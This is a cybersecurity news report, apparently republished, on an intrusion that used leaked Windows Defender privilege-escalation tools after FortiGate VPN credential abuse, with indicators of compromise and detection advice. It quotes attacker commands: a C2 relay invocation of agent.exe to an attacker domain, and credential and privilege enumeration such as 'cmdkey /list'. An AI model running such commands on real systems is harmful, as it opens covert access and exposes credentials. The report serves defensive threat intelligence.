The incident marks the first confirmed in-the-wild deployment of these tools against a live enterprise environment, raising urgent alarms for security teams globally.
The tools at the center of this incident were developed by a security researcher known as Chaotic Eclipse, also referred to as Nightmare-Eclipse, a pseudonymous figure who grew frustrated with Microsoft’s vulnerability disclosure process and publicly released a series of local privilege escalation (LPE) exploits in retaliation.
The trio of tools BlueHammer, RedSun, and UnDefend exploits logic flaws in Windows Defender’s privileged operations to escalate an attacker from an unprivileged user account to SYSTEM-level access, or to disrupt Defender’s security functions entirely without requiring administrative rights.
Microsoft addressed BlueHammer in its April 2026 Patch Tuesday update, tracking it as CVE-2026-33825. However, as of publication, RedSun and UnDefend remain unpatched zero-days actively usable against fully updated Windows systems.
Huntress first detected suspected in-the-wild use of BlueHammer on April 10, 2026, when a binary named FunnyApp.exe — a build pulled directly from the public BlueHammer GitHub repository was executed from a victim user’s Pictures folder and subsequently quarantined by Defender as Exploit:Win32/DfndrPEBluHmr.BZ.
Activity escalated on April 16, with investigators observing RedSun.exe an execution from the user’s Downloads directory, alongside multiple executions of undef.exe the UnDefend binary from short two-letter subfolders such as ks and kk.
In a telling sign of operator inexperience, the threat actor invoked UnDefend with an -agressive flag (misspelled) and a -h help flag that does nothing in the tool, demonstrating they had not fully read or understood the tooling.
Critically, none of the privilege escalation attempts succeeded: BlueHammer did not extract SAM credentials, RedSun did not overwrite TieringEngineService.exe in System32, and UnDefend was terminated by Huntress’ SOC during active remediation.
Customer-provided VPN logs revealed a critical piece of the puzzle. On April 15, 2026, at 13:44 UTC, an attacker initiated an SSL VPN connection to the victim’s FortiGate firewall using valid user credentials from IP 78.29.48[.]29, geolocated to Russia.
Subsequent unauthorized sessions tied to the same account were observed from 212.232.23[.]69 (Singapore) and 179.43.140[.]214 (Switzerland) a multi-geography access pattern consistent with credential abuse and possible credential resale or sharing.
The most operationally dangerous component Huntress identified was a Go-compiled Windows binary dubbed BeigeBurrow, executing as agent.exe -server staybud.dpdns[.]org:443 -hide.
The tool uses HashiCorp’s Yamux multiplexing library to establish a persistent, covert TCP relay between the compromised host and attacker-controlled infrastructure over port 443, a port rarely blocked by enterprise firewalls.
Unlike the privilege escalation tools, BeigeBurrow successfully connected outbound and is the only component in the observed toolkit that achieved its intended purpose. Huntress noted it has observed BeigeBurrow in at least one other unrelated intrusion, though attribution remains unclear.
Beyond tool execution, Huntress confirmed the presence of a live, hands-on-keyboard threat actor through post-exploitation enumeration commands, including whoami /priv, cmdkey /list, and net group.
Notably, whoami /priv was spawned directly from an M365Copilot.exe process, an anomaly that investigators could not fully explain but noted occurred after the initial compromise and following BlueHammer’s first execution attempt.
| Indicator | Type | Description |
|---|---|---|
78.29.48[.]29 | IP | SSL VPN source, Russia |
212.232.23[.]69 | IP | SSL VPN source, Singapore |
179.43.140[.]214 | IP | SSL VPN source, Switzerland |
staybud.dpdns[.]org | Domain | BeigeBurrow C2 server |
FunnyApp.exe, RedSun.exe, undef.exe, z.exe | File | Nightmare-Eclipse binaries |
Exploit:Win32/DfndrPEBluHmr.BZ | Defender Alert | BlueHammer detection signature |
a2b6c7a9...e2876b7c | SHA-256 | BeigeBurrow agent.exe hash |
Organizations should treat any confirmed execution of these binaries as high-priority incident activity. Huntress recommends the following immediate actions:
Pictures and short subfolders under Downloads for binaries like FunnyApp.exe, RedSun.exe, undef.exe, and z.exe.agent.exe with -server and -hide flags, and block the domain staybud.dpdns[.]org.whoami /priv, cmdkey /list, and net group spawned from unusual parent processes.A YARA detection rule for BeigeBurrow has been published publicly to aid community-wide detection efforts.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Hackers Use Nightmare-Eclipse Tools After Compromising FortiGate SSL VPN Access appeared first on Cyber Security News.
Forrester has published a new white paper sponsored by Simpplr that examines how genAI and…
At GrafanaCON ’26 in Barcelona, the company has introduced new AI observability tools. It claims…
Grafana Labs has dropped its biggest update in years. Grafana 13 is about open observability.…
Eleven months ago, Xactly announced a collaboration with ServiceNow to provide the sales industry enhanced…
In volatile markets, it’s important that businesses recognise change and respond accordingly. Supply chain disruption,…
Last year, Hasbro debuted one of its most unusual and interesting Transformers collaborations ever with…
This website uses cookies.